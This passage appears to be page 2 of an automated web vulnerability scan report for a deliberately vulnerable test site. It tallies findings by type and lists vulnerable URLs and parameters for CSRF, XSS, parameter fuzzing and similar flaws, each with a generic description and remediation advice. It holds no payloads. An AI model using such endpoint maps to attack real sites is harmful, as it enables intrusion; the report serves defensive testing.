Vulnerabilities Report (Page 2 of 3)

 Scan Name: Webscantest-includeAPIs-reactjs
 Date: 8/24/2016 11:24:23 PM
 Authenticated User: testuser
 Total Links / Attackable Links: 416 / 416
 Target URL: http://webscantest.com
 Reports:
<< >>

Summary


Vulnerabilities by Risk

Root Causes: 250

Vulnerabilities by Who Will Fix

Most Vulnerable Sites

Vulnerability Type

Root Causes

Variances

Blind SQL Injection  15   48 
Browser Cache directive (leaking sensitive information)  20   31 
Brute Force Form based Authentication  1   1 
Buffer Overflow  6   10 
Business Logic Abuse  5   5 
Command Injection  1   4 
Content Type Charset Check  100   153 
Cross-Site Request Forgery (CSRF)  25   50 
Custom Passive Check  10   10 
Directory Indexing  3   3 
DOM based Cross-site scripting (XSS)  1   1 
HTTP Verb Tampering  1   2 
HttpOnly attribute  5   7 
Information Leakage  4   4 
Parameter Fuzzing  6   16 
Persistent Cross-site scripting (XSS)  2   6 
Predictable Resource Location  2   2 
Reflected Cross-site scripting (XSS)  20   141 
Server Type Disclosure  2   2 
Session Fixation  1   1 
Session Strength  1   1 
SQL Information Leakage  5   7 
SQL Injection  9   36 
SQL injection Auth Bypass  1   3 
SQL Parameter Check  1   1 
XPath Injection  3   11 
Total:  250   556 

Details

   Disable Validate Applet
  Collapse All Attacks   Collapse All

Collapse Cross-Site Request Forgery (CSRF)

some text
  Collapse Site: http://webscantest.com:80
URL: http://webscantest.com/crosstraining/aboutyou.php Root Cause #150: (2 Attack Variances)  Expand
URL: http://webscantest.com/crosstraining/aboutyou2.php Root Cause #151: (2 Attack Variances)  Expand
URL: http://webscantest.com/crosstraining/request.php Root Cause #152: (2 Attack Variances)  Expand
URL: http://webscantest.com/crosstraining/review.php Root Cause #153: (2 Attack Variances)  Expand
URL: http://webscantest.com/crosstraining/search.php Root Cause #154: (2 Attack Variances)  Expand
URL: http://webscantest.com/crosstraining/sitereviews.php Root Cause #155: (2 Attack Variances)  Expand
URL: http://webscantest.com/csrf/csrfpost.php Root Cause #156: (2 Attack Variances)  Expand
URL: http://webscantest.com/csrf/token.php Root Cause #157: (2 Attack Variances)  Expand
URL: http://webscantest.com/datastore/search_by_id.php Root Cause #158: (2 Attack Variances)  Expand
URL: http://webscantest.com/datastore/search_by_name.php Root Cause #159: (2 Attack Variances)  Expand
URL: http://webscantest.com/datastore/search_double_by_name.php Root Cause #160: (2 Attack Variances)  Expand
URL: http://webscantest.com/datastore/search_single_by_name.php Root Cause #161: (2 Attack Variances)  Expand
URL: http://webscantest.com/infodb/comment.php Root Cause #162: (2 Attack Variances)  Expand
URL: http://webscantest.com/infodb/search_by_name.php Root Cause #163: (2 Attack Variances)  Expand
URL: http://webscantest.com/osrun/whois.php Root Cause #164: (2 Attack Variances)  Expand
URL: http://webscantest.com/osrun/whois_nv.php Root Cause #165: (2 Attack Variances)  Expand
URL: http://webscantest.com/payment_analysis/checkdata.php Root Cause #166: (2 Attack Variances)  Expand
URL: http://webscantest.com/rest/demo/index.php/products/52904 Root Cause #167: (2 Attack Variances)  Expand
URL: http://webscantest.com/rest/demo/index.php/products/56035 Root Cause #168: (2 Attack Variances)  Expand
URL: http://webscantest.com/shutterdb/filter_by_name.php Root Cause #169: (2 Attack Variances)  Expand
URL: http://webscantest.com/shutterdb/search_by_id.php Root Cause #170: (2 Attack Variances)  Expand
URL: http://webscantest.com/shutterdb/search_by_name.php Root Cause #171: (2 Attack Variances)  Expand
URL: http://webscantest.com/soap/demo/api/ Root Cause #172: (2 Attack Variances)  Expand
some text
  Collapse Site: http://www.webscantest.com:80
URL: http://www.webscantest.com/soap/demo/api/index.php Root Cause #173: (2 Attack Variances)  Expand

Description:  

Cross-Site Request Forgery (CSRF) is an attack that tricks the victim into loading a page that contains a malicious request. It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf, like change the victim's e-mail address, home address, or password, or purchase something. CSRF attacks generally target functions that cause a state change on the server but can also be used to access sensitive data.
For most sites, browsers will automatically include with such requests any credentials associated with the site, such as the user's session cookie, basic auth credentials, IP address, Windows domain credentials, etc. Therefore, if the user is currently authenticated to the site, the site will have no way to distinguish this from a legitimate user request.
In this way, the attacker can make the victim perform actions that they didn't intend to, such as logout, purchase item, change account information, retrieve account information, or any other function provided by the vulnerable website.
Sometimes, it is possible to store the CSRF attack on the vulnerable site itself. Such vulnerabilities are called Stored CSRF flaws. This can be accomplished by simply storing an IMG or IFRAME tag in a field that accepts HTML, or by a more complex cross-site scripting attack. If the attack can store a CSRF attack in the site, the severity of the attack is amplified. In particular, the likelihood is increased because the victim is more likely to view the page containing the attack than some random page on the Internet. The likelihood is also increased because the victim is sure to be authenticated to the site already.
Synonyms: CSRF attacks are also known by a number of other names, including XSRF, "Sea Surf", Session Riding, Cross-Site Reference Forgery, Hostile Linking. Microsoft refers to this type of attack as a One-Click attack in their threat modeling process and many places in their online documentation.


Recommendations:  

Web sites have various CSRF countermeasures available:

  • Requiring a secret, user-specific token in all form submissions and side-effect URLs prevents CSRF; the attacker's site cannot put the right token in its submissions
  • Requiring the client to provide authentication data in the same HTTP Request used to perform any operation with security implications (money transfer, etc.)
  • Limiting the lifetime of session cookies
  • Checking the HTTP Referer header
  • Ensuring that there is no clientaccesspolicy.xml file granting unintended access to Silverlight controls
  • Ensuring that there is no crossdomain.xml file granting unintended access to Flash movies

An easy and effective solution is to use a CSRF filter such as OWASP's CSRFGuard. The filter intercepts responses, detects if it is a html document and inserts a token in to the forms and optionally inserts script to insert tokens in ajax functions. The filter also intercepts requests to check that the token is present.


Collapse Custom Passive Check

some text
  Collapse Site: http://webscantest.com:80
URL: http://webscantest.com/crosstraining/product.php Root Cause #174: (1 Attack Variance)  Expand
URL: http://webscantest.com/crosstraining/products.php Root Cause #175: (1 Attack Variance)  Expand
URL: http://webscantest.com/crosstraining/review.php Root Cause #176: (1 Attack Variance)  Expand
URL: http://webscantest.com/datastore/search_get_by_id.php Root Cause #177: (1 Attack Variance)  Expand
URL: http://webscantest.com/shutterdb/filter_by_name.php Root Cause #178: (1 Attack Variance)  Expand
URL: http://webscantest.com/shutterdb/search_get_by_id.php Root Cause #179: (1 Attack Variance)  Expand
URL: http://webscantest.com/shutterdb/search_get_by_id2.php Root Cause #180: (1 Attack Variance)  Expand
URL: http://webscantest.com/shutterdb/search_get_by_id3.php Root Cause #181: (1 Attack Variance)  Expand
URL: http://webscantest.com/shutterdb/search_get_by_id4.php Root Cause #182: (1 Attack Variance)  Expand
URL: http://webscantest.com/shutterdb/search_get_by_id5.php Root Cause #183: (1 Attack Variance)  Expand

Description:  

The description for the Example Passive Attack.


Recommendations:  

Refer to your web server's documentation for instructions.


Collapse Directory Indexing

some text
  Collapse Site: http://webscantest.com:80
URL: http://webscantest.com/css/ Root Cause #184:  Validate Expand
URL: http://webscantest.com/images/ Root Cause #185:  Validate Expand
URL: http://webscantest.com/myfiles/ Root Cause #186:  Validate Expand

Description:  

A full list of a directory's content can be viewed. This reveals each file and subdirectory, regardless of whether or not it is related to the web application. A directory listing may also reveal backup files, include files, or configuration files that are not normally viewable by users. When these types of files can be found, they often disclose sensitive information about the application.


Recommendations:  

Refer to your web server's documentation for instructions on prohibiting directory listings.


Collapse DOM based Cross-site scripting (XSS)

some text
  Collapse Site: http://webscantest.com:80
URL: http://webscantest.com/crosstraining/sample.php Root Cause #187: (1 Attack Variance)  Expand

Description:  

DOM-based Cross-Site Scripting is the de-facto name for XSS bugs which are the result of active content on a page, typically JavaScript, obtaining user input and then doing something unsafe with it to lead to execution of injected code. This document will only discuss JavaScript bugs which lead to XSS.

The DOM, or Document Object Model, is the structural format that may be used to represent documents in the browser. The DOM enables dynamic scripts such as JavaScript to reference components of the document such as a form field or a session cookie. The DOM is also used by the browser for security - for example to limit scripts on different domains obtaining session cookies for other domains. A DOM-based cross site scripting vulnerability may occur when active content, such as a JavaScript function, is modified by a specially crafted request such that a DOM element that can be controlled by an attacker.

There have been very few papers published on this topic and, as such, very little standardization of its meaning and formalized testing exists.


Recommendations:  

Not all XSS bugs require the attacker to control the content returned from the server, but can instead abuse poor JavaScript coding practices to achieve the same results. The consequences are the same as a typical XSS flaw, only the means of delivery is different.

In comparison to other cross site scripting vulnerabilities (reflected and stored XSS), where an unsanitized parameter is passed by the server, returned to the user and executed in the context of the user's browser, a DOM based cross site scripting vulnerability controls the flow of the code by using elements of the Document Object Model (DOM) along with code crafted by the attacker to change the flow.

Due to their nature, DOM based XSS vulnerabilities can be executed in many instances without the server being able to determine what is actually being executed. This may result in many of the general XSS filtering and detection rules impotent against such attacks.
The consequences of DOM based cross site scripting flaws are as wide ranging as those seen in more well known forms of XSS, including cookie retrieval, further malicious script injection, etc. and should therefore be treated with the same severity as such.


Collapse HTTP Verb Tampering

some text
  Collapse Site: http://webscantest.com:80
URL: http://webscantest.com/crosstraining/review.php Root Cause #188: (2 Attack Variances)  Expand

Description:  

A page which is expecting only POST requests, is requested by HTTP method GET.

This attack module sends a GET request to a page which has only been used for POSTs.
HTTP Verb tampering is generally used in conjunction with syntactic and semantic attacks as way to bypass certain defense measures.
When an application does not properly handle user supplied data, an attacker can supply content to a web application, typically via a parameter value, that is reflected back to the user.
By requesting the link with a modified http verb, the page renders the parameter values.
Recommendations:  

Some resources may allow both GET and POST methods e.g. an edit form may be hyperlinked using a parameter value defining the record to be edited, but the form is submitted by POST to itself. Users may bookmark a page that is the result of a POST and return to it at a later date.

To protect yourself from syntactic HTTP verb manipulation attacks, make sure you only include user-supplied data from where it’s expected to be received (Query string or POST data), or sanity check them both the same if necessary. Also only include the parameter names in the session object you expect to receive. Don’t allow attackers to add arbitrary name/value pairs.


Collapse HttpOnly attribute

some text
  Collapse Site: http://webscantest.com:80
URL: http://webscantest.com/crosstraining/request.php Root Cause #189: (1 Attack Variance)  Expand
URL: http://webscantest.com/datastore/search_get_by_id.php Root Cause #190: (1 Attack Variance)  Expand
URL: http://webscantest.com/login.php Root Cause #191: (3 Attack Variances)  Expand
URL: http://webscantest.com/shutterdb/search_get_by_id4.php Root Cause #192: (1 Attack Variance)  Expand
URL: http://webscantest.com/shutterdb/search_get_by_id5.php Root Cause #193: (1 Attack Variance)  Expand

Description:  

The HttpOnly attribute directs browsers to use cookies via the HTTP protocol only. An HttpOnly cookie is not accessible via non-HTTP methods, such as calls via JavaScript (e.g., referencing "document.cookie"), and therefore cannot be stolen easily via cross-site scripting (a pervasive attack technique).


Recommendations:  

If the HttpOnly flag (optional) is included in the HTTP response header, the cookie cannot be accessed through client side script (again if the browser supports this flag). As a result, even if a cross-site scripting (XSS) flaw exists, and a user accidentally accesses a link that exploits this flaw, the browser (primarily Internet Explorer) will not reveal the cookie to a third party.


Collapse Information Leakage

some text
  Collapse Site: http://webscantest.com:80
URL: http://webscantest.com/cors_private.php Root Cause #194: (1 Attack Variance)  Expand
URL: http://webscantest.com/cors_public.php Root Cause #195: (1 Attack Variance)  Expand
some text
  Collapse Site: http://www.webscantest.com:80
URL: http://www.webscantest.com/cors_private.php Root Cause #196: (1 Attack Variance)  Expand
URL: http://www.webscantest.com/cors_public.php Root Cause #197: (1 Attack Variance)  Expand

Description:  

Revealing system data or debugging information helps an adversary learn about the system and form a plan of attack. An information leak occurs when system data or debugging information leaves the program through an output stream or logging function.


Recommendations:  

Depending upon the system configuration, this information can be dumped to a console, written to a log file, or exposed to a remote user. In some cases the error message tells the attacker precisely what sort of an attack the system will be vulnerable to.
For example, a database error message can reveal that the application is vulnerable to a SQL injection attack. Other error messages can reveal more oblique clues about the system.
In the example above, the search path could imply information about the type of operating system, the applications installed on the system, and the amount of care that the administrators have put into configuring the program.


Collapse Parameter Fuzzing

some text
  Collapse Site: http://webscantest.com:80
URL: http://webscantest.com/payment_analysis/checkdata.php Root Cause #198: (Parameter: number / 3 Attack Variances)  Expand
URL: http://webscantest.com/payment_analysis/checkdata.php Root Cause #199: (Parameter: letters_only / 3 Attack Variances)  Expand
URL: http://webscantest.com/payment_analysis/checkdata.php Root Cause #200: (Parameter: alpha_only / 2 Attack Variances)  Expand
URL: http://webscantest.com/payment_analysis/checkdata_get.php Root Cause #201: (Parameter: number / 3 Attack Variances)  Expand
URL: http://webscantest.com/payment_analysis/checkdata_get.php Root Cause #202: (Parameter: letters_only / 3 Attack Variances)  Expand
URL: http://webscantest.com/payment_analysis/checkdata_get.php Root Cause #203: (Parameter: alpha_only / 2 Attack Variances)  Expand

Description:  

An invalid character submitted in a URL parameter causes an error in the database query or script execution. This indicates that the application has not fully validated user-supplied input. These errors can lead to HTML injection, SQL injection, or arbitrary code execution.


Recommendations:  

  • Normalize all user-supplied data before applying filters, regular expressions, or submitting the data to a database. This means that all URL-encoded (%xx), HTML-encoded (&#xx;), or other encoding schemes should be reduced to the internal character representation expected by the application. This prevents attackers from using alternate encoding schemes to bypass filters.
  • Implement positive filters that examine user-supplied data for expected characters. Define data types for user-supplied values and ensure that submitted data match these types, such as numeric or date. String or text values should be carefully matched to a limited subset of characters such as alpha, numeric, spaces, or certain punctuation characters as necessary. If any value received by the application contains an unexpected character, then it should be rejected.
  • Negative filtering can also prevent attacks, but may be more unreliable or more difficult to implement for language sets that require non-ASCII characters. Examine all data received from the web browser for SQL syntax characters. If any of these characters are present, then they should be escaped or removed. The single quote (') or double quote (") are often used to envelope parameters in a SQL query. Other malicious characters include the asterisk, semi-colon, dash (minus sign), and parentheses. These characters could be used to prematurely end a query statement.


Collapse Persistent Cross-site scripting (XSS)

some text
  Collapse Site: http://webscantest.com:80
URL: http://webscantest.com/crosstraining/request.php Root Cause #204: (Parameter: fname / 5 Attack Variances)  Expand
URL: http://webscantest.com/crosstraining/reservation_history.php Root Cause #205: (1 Attack Variance)  Expand


Description:  

Persistent Cross-site Scripting (XSS) is the attack that is loaded with the vulnerable web application. The attack is originated by the victim loading the offending URI.


Recommendations:  

  • Filter all information sent to the server via form POST/GET and URL query parameters with a particular emphasis on filtering out HTML-specific characters.
  • Escape the escape characters, which attackers can use to neutralize your attempts to be safe. Use a security-focused encoding library to make sure these rules are properly implemented
  • Never insert untrusted data into your HTML document
  • For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side.


Description:  

Persistent XSS attacks are those where the injected script is permanently stored in database, message forum, visitor log, or other trusted data store. The victim then retrieves the malicious script from the server when it requests the stored information. For example, the attacker might inject XSS into a log message, which might not be handled properly when an administrator views the logs.


Recommendations:  

  • Filter all information sent to the client with a particular emphasis on filtering out HTML-specific characters.
  • Understand the context in which your data will be used and the encoding that will be expected.
  • For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side.


Collapse Predictable Resource Location

some text
  Collapse Site: http://webscantest.com:80
URL: http://webscantest.com/robots.txt Root Cause #206:  Validate Expand
some text
  Collapse Site: http://www.webscantest.com:80
URL: http://www.webscantest.com/robots.txt Root Cause #207:  Validate Expand

Description:  

A robots.txt file is present in the directory. The robots.txt file provides a list of directories that crawling engines are requested to ignore. There is no way to force the crawling engine to honor the robots.txt file. Depending on the content of the file, it may reveal administrator interfaces or alternate URLs that are supposed to be hidden from users.


Recommendations:  

  1. Ensure that the robots.txt file does not divulge directories that are intended to be hidden from users.
  2. The security of sensitive directories should not rely on hiding their presence. Restrict access to sensitive directories (e.g. admin) by password and IP address or network location.
  3. Amend your deployment policy to include the removal of sensitive directories from robots.txt files.


Collapse Reflected Cross-site scripting (XSS)

some text
  Collapse Site: http://webscantest.com:80
URL: http://webscantest.com/bjax/servertime.php Root Cause #208: (Parameter: msg / 8 Attack Variances)  Expand
URL: http://webscantest.com/business/account.php Root Cause #209: (Parameter: accountId / 8 Attack Variances)  Expand
URL: http://webscantest.com/crosstraining/ Root Cause #210: (Parameter: Referer / 4 Attack Variances)  Expand
URL: http://webscantest.com/crosstraining/aboutyou.php Root Cause #211: (Parameter: fname / 8 Attack Variances)  Expand
URL: http://webscantest.com/crosstraining/aboutyou2.php Root Cause #212: (Parameter: fname / 8 Attack Variances)  Expand
URL: http://webscantest.com/crosstraining/aboutyou2.php Root Cause #213: (Parameter: nick / 8 Attack Variances)  Expand
URL: http://webscantest.com/crosstraining/aboutyou2.php Root Cause #214: (Parameter: returnto / 8 Attack Variances)  Expand
URL: http://webscantest.com/crosstraining/blockedbyns.php Root Cause #215: (Parameter: Comment / 2 Attack Variances)  Expand
URL: http://webscantest.com/crosstraining/checkitem_lookup.php Root Cause #216: (Parameter: q / 8 Attack Variances)  Expand
URL: http://webscantest.com/crosstraining/index.php Root Cause #217: (Parameter: Referer / 4 Attack Variances)  Expand
URL: http://webscantest.com/crosstraining/request.php Root Cause #218: (Parameter: fname / 8 Attack Variances)  Expand
URL: http://webscantest.com/crosstraining/reservation_submit.php Root Cause #219: (Parameter: arrive_date / 8 Attack Variances)  Expand
URL: http://webscantest.com/crosstraining/sitereviews.php Root Cause #220: (Parameter: description / 8 Attack Variances)  Expand
URL: http://webscantest.com/csrf/csrfpost.php Root Cause #221: (Parameter: property / 8 Attack Variances)  Expand
URL: http://webscantest.com/csrf/session.php Root Cause #222: (Parameter: jsession / 8 Attack Variances)  Expand